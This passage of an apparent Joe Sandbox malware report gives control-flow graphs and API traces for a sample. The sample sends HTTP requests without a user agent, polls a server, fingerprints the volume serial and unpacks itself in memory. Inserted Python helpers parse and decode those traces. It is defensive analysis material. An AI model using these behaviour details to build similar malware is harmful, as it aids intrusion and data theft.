                                     • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: HttpQueryInfoA$InternetSetOptionA
                                    • API String ID: 2238633743-1775429166
                                    • Opcode ID: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                                    • Instruction ID: b148544ec257a615b167952e2e9b89b3667e8f5620887ecf26b211dda149ff7d
                                    • Opcode Fuzzy Hash: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                                    • Instruction Fuzzy Hash: 02621DBD5C0200BFD364DFE8EE889A63BFBF74E701714A61AE609C3264D6399441DB52

                                    Control-flow Graph

                                    control_flow_graph 1001 406280-40630b call 41a7a0 call 4047b0 call 41a740 InternetOpenA StrCmpCA 1008 406314-406318 1001->1008 1009 40630d 1001->1009 1010 406509-406525 call 41a7a0 call 41a800 * 2 1008->1010 1011 40631e-406342 InternetConnectA 1008->1011 1009->1008 1030 406528-40652d 1010->1030 1013 406348-40634c 1011->1013 1014 4064ff-406503 InternetCloseHandle 1011->1014 1016 40635a 1013->1016 1017 40634e-406358 1013->1017 1014->1010 1019 406364-406392 HttpOpenRequestA 1016->1019 1017->1019 1021 4064f5-4064f9 InternetCloseHandle 1019->1021 1022 406398-40639c 1019->1022 1021->1014 1024 4063c5-406405 HttpSendRequestA HttpQueryInfoA 1022->1024 1025 40639e-4063bf InternetSetOptionA 1022->1025 1027 406407-406427 call 41a740 call 41a800 * 2 1024->1027 1028 40642c-40644b call 418940 1024->1028 1025->1024 1027->1030 1035 4064c9-4064e9 call 41a740 call 41a800 * 2 1028->1035 1036 40644d-406454 1028->1036 1035->1030 1039 406456-406480 InternetReadFile 1036->1039 1040 4064c7-4064ef InternetCloseHandle 1036->1040 1044 406482-406489 1039->1044 1045 40648b 1039->1045 1040->1021 1044->1045 1048 40648d-4064c5 call 41a9b0 call 41a8a0 call 41a800 1044->1048 1045->1040 1048->1039
                                    APIs
                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                      • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                      • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                    • StrCmpCA.SHLWAPI(?,00A1B398), ref: 00406303
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                    • HttpOpenRequestA.WININET(00000000,GET,?,00A1A780,00000000,00000000,00400100,00000000), ref: 00406385
                                    • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                    • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 004063FD
                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040646D
                                    • InternetCloseHandle.WININET(00000000), ref: 004064EF
                                    • InternetCloseHandle.WININET(00000000), ref: 004064F9
                                    • InternetCloseHandle.WININET(00000000), ref: 00406503
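The two WinINet routines in this report (the POST routine at 404880 and the GET routine at 406280 above) print their calls as `API.MODULE(args), ref: site`, with constant arguments left as raw hex. The Python below is an added example, not part of the Joe Sandbox report or of the sample: it parses those lines, decodes the WinINet constants with the values from wininet.h (the flag table is deliberately partial), orders the direct call sites by address, and separates the entries the report attributes to a sub-call. The sample input is copied from the GET routine's list above; the `agent` and `port` wording is this example's own.

```python
import re
from dataclasses import dataclass

# One entry of a per-function "APIs" list as the report prints it, e.g.
#   InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
# Entries reached through a callee carry the prefix "Part of subcall function <addr>: ".
API_LINE = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-F]{8}): )?"
    r"(?P<api>[^.\s(]+)\.(?P<module>[A-Z0-9_]+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-F]{8})$")

@dataclass
class ApiCall:
    api: str
    module: str
    args: list            # argument tokens exactly as printed ("?" = not recovered)
    ref: int              # address of the call site
    caller: "str | None"  # callee address when the entry came from a sub-call

def parse_trace(text):
    """Turn the bullet list under 'APIs' into ApiCall records; other lines are skipped."""
    calls = []
    for raw in text.splitlines():
        m = API_LINE.match(raw.strip().lstrip("•").strip())
        if m:
            calls.append(ApiCall(m["api"], m["module"], m["args"].split(","),
                                 int(m["ref"], 16), m["caller"]))
    return calls

def _u32(tok):
    try:
        return int(tok, 16)
    except ValueError:
        return None       # "?" or a string literal such as GET

# wininet.h values for the arguments the trace shows only as raw numbers (flag table partial).
OPEN_TYPE = {0: "INTERNET_OPEN_TYPE_PRECONFIG", 1: "INTERNET_OPEN_TYPE_DIRECT", 3: "INTERNET_OPEN_TYPE_PROXY"}
SERVICE = {1: "INTERNET_SERVICE_FTP", 2: "INTERNET_SERVICE_GOPHER", 3: "INTERNET_SERVICE_HTTP"}
OPTION = {31: "INTERNET_OPTION_SECURITY_FLAGS"}
QUERY = {19: "HTTP_QUERY_STATUS_CODE", 20: "HTTP_QUERY_STATUS_TEXT"}
REQUEST_FLAGS = {
    0x80000000: "INTERNET_FLAG_RELOAD", 0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x00800000: "INTERNET_FLAG_SECURE", 0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
    0x00200000: "INTERNET_FLAG_NO_AUTO_REDIRECT", 0x00080000: "INTERNET_FLAG_NO_COOKIES",
    0x00002000: "INTERNET_FLAG_IGNORE_CERT_DATE_INVALID", 0x00001000: "INTERNET_FLAG_IGNORE_CERT_CN_INVALID",
    0x00000200: "INTERNET_FLAG_NO_UI", 0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE"}

def flag_names(value):
    """Symbolic names for a dwFlags value; bits the table lacks are kept as a hex remainder."""
    rest = value & ~sum(REQUEST_FLAGS)
    return [n for bit, n in REQUEST_FLAGS.items() if value & bit] + (["0x%08X" % rest] if rest else [])

def decode_wininet(call):
    """Human-readable meaning of the constant arguments of one WinINet call."""
    a, out = call.args, {}
    g = lambda i: a[i] if i < len(a) else "?"
    if call.api == "InternetOpenA":
        out["agent"] = "NULL (no User-Agent)" if g(0) == "00000000" else g(0)
        out["access_type"] = OPEN_TYPE.get(_u32(g(1)), g(1))
    elif call.api == "InternetConnectA":
        port = _u32(g(2))
        out["port"] = "default for service" if port == 0 else (g(2) if port is None else port)
        out["service"] = SERVICE.get(_u32(g(5)), g(5))
    elif call.api == "HttpOpenRequestA":
        out["verb"], out["flags"] = g(1), flag_names(_u32(g(6)) or 0)
    elif call.api == "InternetSetOptionA":
        out["option"] = OPTION.get(_u32(g(1)), g(1))
    elif call.api == "HttpQueryInfoA":
        out["info_level"] = QUERY.get(_u32(g(1)), g(1))
    elif call.api == "InternetReadFile":
        out["buffer_size"] = _u32(g(2))
    return out

def summarize(text):
    """Direct call sites in address order (layout order, not runtime order: loops and
    branches are invisible here), decoded arguments, and which entries are sub-calls."""
    calls = parse_trace(text)
    direct = sorted((c for c in calls if c.caller is None), key=lambda c: c.ref)
    return {"order": [c.api for c in direct],
            "decoded": {c.api: decode_wininet(c) for c in calls if decode_wininet(c)},
            "subcalls": {c.api: c.caller for c in calls if c.caller}}

# Sample input copied from the report's list for the GET routine (not constructed).
GET_ROUTINE = """
• Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
• InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
• StrCmpCA.SHLWAPI(?,00A1B398), ref: 00406303
• InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
• HttpOpenRequestA.WININET(00000000,GET,?,00A1A780,00000000,00000000,00400100,00000000), ref: 00406385
• InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
• HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
• HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 004063FD
• InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040646D
• InternetCloseHandle.WININET(00000000), ref: 004064EF
"""

if __name__ == "__main__":
    s = summarize(GET_ROUTINE)
    print(" -> ".join(s["order"]))
    for api, d in s["decoded"].items():
        print(api, d)
```

Run on the GET routine this gives InternetOpenA with INTERNET_OPEN_TYPE_DIRECT, InternetConnectA with INTERNET_SERVICE_HTTP and a port the sandbox did not recover, HttpOpenRequestA with INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_PRAGMA_NOCACHE, InternetSetOptionA with INTERNET_OPTION_SECURITY_FLAGS and a 4-byte buffer (the value written is not in the trace, so what it ignores cannot be read off the page), HttpQueryInfoA asking for HTTP_QUERY_STATUS_CODE into a 0x100-byte buffer, and InternetReadFile reading 0x7CF bytes per iteration. The POST routine's InternetOpenA passes a NULL agent string, which is what the report's "HTTP GET or POST without a user agent" signature refers to. The address order is the function's layout, not the execution order: the loop back to InternetReadFile and the early-return branches only show up in the control-flow graph.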
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Similarity
                                    • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                    • String ID: ERROR$ERROR$GET
                                    • API String ID: 3074848878-2509457195
                                    • Opcode ID: c8a6f04fdac549dd7e3b25e171be04d87dad98b8dac672af1d85c5c8f489a90f
                                    • Instruction ID: 4c22ad93782da972e928cd377ef6cc95e5ae9f8df18decad01f21c65d1bf8a87
                                    • Opcode Fuzzy Hash: c8a6f04fdac549dd7e3b25e171be04d87dad98b8dac672af1d85c5c8f489a90f
                                    • Instruction Fuzzy Hash: C1718075A00218ABDB24EFE0DC49BEE7775FB44700F10816AF50A6B1D0DBB86A85CF56
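Each `control_flow_graph` line in this report is the rendered graph flattened to text: block definitions (`<id> <start>-<end>` followed by the block's calls, where `call <addr>` is an internal sub and `* n` repeats the preceding call) interleaved with edges (`<a>-><b>`). The Python below is an added example, not part of the Joe Sandbox report or of the sample. It parses that format back into blocks and edges and then answers two questions a reviewer of the GET routine at 406280 would ask: which API sequences can lead from the entry block to InternetReadFile, and which paths reach the function's exit without ever passing through a block that calls InternetCloseHandle. The graph text is copied from the GET routine's record above; the path-enumeration logic and the `sub_` prefix for internal calls are this example's own.

```python
import re

# A block definition is "<id> <start>-<end>" (or a single address for a one-instruction
# block) followed by its calls; "call <addr>" is an internal sub, "* n" repeats the
# preceding call, and "<a>-><b>" is an edge between block ids.
ADDR = re.compile(r"^[0-9a-f]{6}(?:-[0-9a-f]{6})?$")

def parse_cfg(line):
    """Return (blocks, edges): blocks maps id -> (address range, [calls]),
    edges is a list of (src, dst) block ids."""
    toks = line.split()
    if toks[0] != "control_flow_graph":
        raise ValueError("not a control_flow_graph dump")
    blocks, edges, cur, i = {}, [], None, 1
    while i < len(toks):
        t = toks[i]
        if "->" in t:
            s, d = t.split("->")
            edges.append((int(s), int(d)))
        elif t.isdigit() and i + 1 < len(toks) and ADDR.match(toks[i + 1]):
            cur = int(t)
            blocks[cur] = (toks[i + 1], [])
            i += 1
        elif t == "call":
            blocks[cur][1].append("sub_" + toks[i + 1])
            i += 1
        elif t == "*":
            blocks[cur][1].extend([blocks[cur][1][-1]] * (int(toks[i + 1]) - 1))
            i += 1
        else:
            blocks[cur][1].append(t)          # a Windows API name
        i += 1
    return blocks, edges

def successors(blocks, edges):
    succ = {b: [] for b in blocks}
    for s, d in edges:
        succ[s].append(d)
    return succ

def api_paths(blocks, edges, entry, target_api):
    """Simple paths from `entry` to the first block calling `target_api`, reported
    as the sequence of Windows API names met on the way (sub_* calls skipped)."""
    succ, found = successors(blocks, edges), []
    def walk(b, seen, apis):
        apis = apis + [c for c in blocks[b][1] if not c.startswith("sub_")]
        if target_api in blocks[b][1]:
            found.append(apis)
            return
        for n in succ[b]:
            if n not in seen:
                walk(n, seen | {n}, apis)
    walk(entry, {entry}, [])
    return found

def exit_paths_without(blocks, edges, entry, api):
    """Simple paths (as block ids) from `entry` to a block with no successors that
    never pass through a block calling `api`."""
    succ, found = successors(blocks, edges), []
    def walk(b, path):
        if api in blocks[b][1]:
            return
        if not succ[b]:
            found.append(path)
            return
        for n in succ[b]:
            if n not in path:
                walk(n, path + [n])
    walk(entry, [entry])
    return found

# The GET routine's graph, copied from the report (a single line in the original).
GET_CFG = (
    "control_flow_graph 1001 406280-40630b call 41a7a0 call 4047b0 call 41a740 InternetOpenA "
    "StrCmpCA 1008 406314-406318 1001->1008 1009 40630d 1001->1009 1010 406509-406525 "
    "call 41a7a0 call 41a800 * 2 1008->1010 1011 40631e-406342 InternetConnectA 1008->1011 "
    "1009->1008 1030 406528-40652d 1010->1030 1013 406348-40634c 1011->1013 1014 4064ff-406503 "
    "InternetCloseHandle 1011->1014 1016 40635a 1013->1016 1017 40634e-406358 1013->1017 "
    "1014->1010 1019 406364-406392 HttpOpenRequestA 1016->1019 1017->1019 1021 4064f5-4064f9 "
    "InternetCloseHandle 1019->1021 1022 406398-40639c 1019->1022 1021->1014 1024 4063c5-406405 "
    "HttpSendRequestA HttpQueryInfoA 1022->1024 1025 40639e-4063bf InternetSetOptionA 1022->1025 "
    "1027 406407-406427 call 41a740 call 41a800 * 2 1024->1027 1028 40642c-40644b call 418940 "
    "1024->1028 1025->1024 1027->1030 1035 4064c9-4064e9 call 41a740 call 41a800 * 2 1028->1035 "
    "1036 40644d-406454 1028->1036 1035->1030 1039 406456-406480 InternetReadFile 1036->1039 "
    "1040 4064c7-4064ef InternetCloseHandle 1036->1040 1044 406482-406489 1039->1044 1045 40648b "
    "1039->1045 1040->1021 1044->1045 1048 40648d-4064c5 call 41a9b0 call 41a8a0 call 41a800 "
    "1044->1048 1045->1040 1048->1039")

def analyze_get_routine():
    blocks, edges = parse_cfg(GET_CFG)
    return {"blocks": len(blocks), "edges": len(edges),
            "to_read": api_paths(blocks, edges, 1001, "InternetReadFile"),
            "exit_without_close": exit_paths_without(blocks, edges, 1001, "InternetCloseHandle")}

if __name__ == "__main__":
    r = analyze_get_routine()
    print(r["blocks"], "blocks,", r["edges"], "edges")
    print("longest path to InternetReadFile:", " -> ".join(max(r["to_read"], key=len)))
    print(len(r["exit_without_close"]), "exit paths never pass InternetCloseHandle, e.g.",
          r["exit_without_close"][0])
```

The graph has 24 blocks and 34 edges. Eight simple paths reach InternetReadFile; all of them start InternetOpenA, StrCmpCA, InternetConnectA, HttpOpenRequestA, and they differ only in whether block 1025 (InternetSetOptionA) is taken before HttpSendRequestA/HttpQueryInfoA, so the security-flags option is conditional. Eighteen paths reach the single exit block 1030 without ever passing an InternetCloseHandle block: they leave through 1010 (straight after the StrCmpCA check in 1008), 1027 (after HttpSendRequestA/HttpQueryInfoA) or 1035 (after the sub at 418940). Whether a WinINet handle is actually leaked on those branches depends on what those subs do, which the dump does not show; the parser only tells you where to look.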

                                    Control-flow Graph

                                    control_flow_graph 1058 4117a0-4117cd call 41aad0 StrCmpCA 1061 4117d7-4117f1 call 41aad0 strtok_s 1058->1061 1062 4117cf-4117d1 ExitProcess 1058->1062 1065 4117f4-4117f8 1061->1065 1066 4119c2-4119cd call 41a800 1065->1066 1067 4117fe-411811 1065->1067 1069 411817-41181a 1067->1069 1070 41199e-4119bd strtok_s 1067->1070 1072 411821-411830 call 41a820 1069->1072 1073 411849-411858 call 41a820 1069->1073 1074 4118ad-4118be StrCmpCA 1069->1074 1075 4118cf-4118e0 StrCmpCA 1069->1075 1076 41198f-411999 call 41a820 1069->1076 1077 4118f1-411902 StrCmpCA 1069->1077 1078 411951-411962 StrCmpCA 1069->1078 1079 411970-411981 StrCmpCA 1069->1079 1080 411913-411924 StrCmpCA 1069->1080 1081 411932-411943 StrCmpCA 1069->1081 1082 411835-411844 call 41a820 1069->1082 1083 41185d-41186e StrCmpCA 1069->1083 1084 41187f-411890 StrCmpCA 1069->1084 1070->1065 1072->1070 1073->1070 1105 4118c0-4118c3 1074->1105 1106 4118ca 1074->1106 1085 4118e2-4118e5 1075->1085 1086 4118ec 1075->1086 1076->1070 1087 411904-411907 1077->1087 1088 41190e 1077->1088 1093 411964-411967 1078->1093 1094 41196e 1078->1094 1096 411983-411986 1079->1096 1097 41198d 1079->1097 1089 411930 1080->1089 1090 411926-411929 1080->1090 1091 411945-411948 1081->1091 1092 41194f 1081->1092 1082->1070 1101 411870-411873 1083->1101 1102 41187a 1083->1102 1103 411892-41189c 1084->1103 1104 41189e-4118a1 1084->1104 1085->1086 1086->1070 1087->1088 1088->1070 1089->1070 1090->1089 1091->1092 1092->1070 1093->1094 1094->1070 1096->1097 1097->1070 1101->1102 1102->1070 1110 4118a8 1103->1110 1104->1110 1105->1106 1106->1070 1110->1070
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Similarity
                                    • API ID: ExitProcessstrtok_s
                                    • String ID: block
                                    • API String ID: 3407564107-2199623458
                                    • Opcode ID: b3dd8198764fe9467e4b2c8b9506a85e5c70b97dc7c09ae6ead8ebf8a0dcb198
                                    • Instruction ID: 00bb13bb87ecd4f31d5cbb7361e66ee12f2c4d363b15aa8138e6c51e0cba8311
                                    • Opcode Fuzzy Hash: b3dd8198764fe9467e4b2c8b9506a85e5c70b97dc7c09ae6ead8ebf8a0dcb198
                                    • Instruction Fuzzy Hash: AC517DB4A10209EFCB04DFA1D954BFE77B6BF44304F10804AE516A7361D778E992CB6A

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1111 415510-415577 call 415ad0 call 41a820 * 3 call 41a740 * 4 1127 41557c-415583 1111->1127 1128 415585-4155b6 call 41a820 call 41a7a0 call 401590 call 4151f0 1127->1128 1129 4155d7-41564c call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1127->1129 1145 4155bb-4155d2 call 41a8a0 call 41a800 1128->1145 1154 415693-4156a9 call 41aad0 StrCmpCA 1129->1154 1159 41564e-41568e call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1129->1159 1145->1154 1161 4157dc-415844 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1154->1161 1162 4156af-4156b6 1154->1162 1159->1154 1291 415ac3-415ac6 1161->1291 1165 4157da-41585f call 41aad0 StrCmpCA 1162->1165 1166 4156bc-4156c3 1162->1166 1185 415991-4159f9 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1165->1185 1186 415865-41586c 1165->1186 1170 4156c5-415719 call 41a820 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1166->1170 1171 41571e-415793 call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1166->1171 1170->1165 1171->1165 1271 415795-4157d5 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1171->1271 1185->1291 1192 415872-415879 1186->1192 1193 41598f-415a14 call 41aad0 StrCmpCA 1186->1193 1201 4158d3-415948 call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1192->1201 1202 41587b-4158ce call 41a820 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1192->1202 1222 415a16-415a21 Sleep 1193->1222 1223 415a28-415a91 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1193->1223 1201->1193 1296 41594a-41598a call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1201->1296 1202->1193 1222->1127 1223->1291 1271->1165 1296->1193
                                    APIs
                                      • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00A12D90,?,0042110C,?,00000000), ref: 0041A82B
                                      • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415644
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004156A1
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415857
                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                      • Part of subcall function 004151F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • Part of subcall function 004152C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                                      • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 0041532F
                                      • Part of subcall function 004152C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                                      • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 00415383
                                      • Part of subcall function 004152C0: strtok.MSVCRT(00000000,?), ref: 0041539E
                                      • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 004153AE
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041578B
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415940
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415A0C
                                    • Sleep.KERNEL32(0000EA60), ref: 00415A1B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen$Sleepstrtok
                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                    • API String ID: 3630751533-2791005934
                                    • Opcode ID: 497b44604cdb86425a2f1df15548df3ba7e7c57ddf51101f201cba8e249eba1a
                                    • Instruction ID: 0baa471f6470c30cedeccf0ca5f41b7a1b3666a88d5ff2061c329f06e4daefd3
                                    • Opcode Fuzzy Hash: 497b44604cdb86425a2f1df15548df3ba7e7c57ddf51101f201cba8e249eba1a
                                    • Instruction Fuzzy Hash: 5BE18675910104AACB04FBB1DD52EED733DAF54314F50812EB406660D1EF3CAB9ACBAA

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1322 417500-41754a GetWindowsDirectoryA 1323 417553-4175c7 GetVolumeInformationA call 418d00 * 3 1322->1323 1324 41754c 1322->1324 1331 4175d8-4175df 1323->1331 1324->1323 1332 4175e1-4175fa call 418d00 1331->1332 1333 4175fc-417617 GetProcessHeap HeapAlloc 1331->1333 1332->1331 1335 417619-417626 call 41a740 1333->1335 1336 417628-417658 wsprintfA call 41a740 1333->1336 1343 41767e-41768e 1335->1343 1336->1343
                                    APIs
                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00417542
                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041757F
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417603
                                    • HeapAlloc.KERNEL32(00000000), ref: 0041760A
                                    • wsprintfA.USER32 ref: 00417640
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                    • String ID: :$C$\
                                    • API String ID: 3790021787-3809124531
                                    • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                    • Instruction ID: 2fa5a76c25c4840d12821100fc964cf287d391274576238511e757cc0c078ff1
                                    • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                    • Instruction Fuzzy Hash: BF41A2B5D44248ABDB10DF94DC45BEEBBB9EF08714F10019DF50967280D778AA84CBA9

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1344 7e003c-7e0047 1345 7e004c-7e0263 call 7e0a3f call 7e0e0f call 7e0d90 VirtualAlloc 1344->1345 1346 7e0049 1344->1346 1361 7e028b-7e0292 1345->1361 1362 7e0265-7e0289 call 7e0a69 1345->1362 1346->1345 1364 7e02a1-7e02b0 1361->1364 1366 7e02ce-7e03c2 VirtualProtect call 7e0cce call 7e0ce7 1362->1366 1364->1366 1367 7e02b2-7e02cc 1364->1367 1373 7e03d1-7e03e0 1366->1373 1367->1364 1374 7e0439-7e04b8 VirtualFree 1373->1374 1375 7e03e2-7e0437 call 7e0ce7 1373->1375 1377 7e04be-7e04cd 1374->1377 1378 7e05f4-7e05fe 1374->1378 1375->1373 1380 7e04d3-7e04dd 1377->1380 1381 7e077f-7e0789 1378->1381 1382 7e0604-7e060d 1378->1382 1380->1378 1386 7e04e3-7e0505 LoadLibraryA 1380->1386 1384 7e078b-7e07a3 1381->1384 1385 7e07a6-7e07b0 1381->1385 1382->1381 1387 7e0613-7e0637 1382->1387 1384->1385 1389 7e086e-7e08be LoadLibraryA 1385->1389 1390 7e07b6-7e07cb 1385->1390 1391 7e0517-7e0520 1386->1391 1392 7e0507-7e0515 1386->1392 1388 7e063e-7e0648 1387->1388 1388->1381 1394 7e064e-7e065a 1388->1394 1400 7e08c7-7e08f9 1389->1400 1395 7e07d2-7e07d5 1390->1395 1393 7e0526-7e0547 1391->1393 1392->1393 1398 7e054d-7e0550 1393->1398 1394->1381 1399 7e0660-7e066a 1394->1399 1396 7e07d7-7e07e0 1395->1396 1397 7e0824-7e0833 1395->1397 1401 7e07e4-7e0822 1396->1401 1402 7e07e2 1396->1402 1406 7e0839-7e083c 1397->1406 1403 7e0556-7e056b 1398->1403 1404 7e05e0-7e05ef 1398->1404 1405 7e067a-7e0689 1399->1405 1407 7e08fb-7e0901 1400->1407 1408 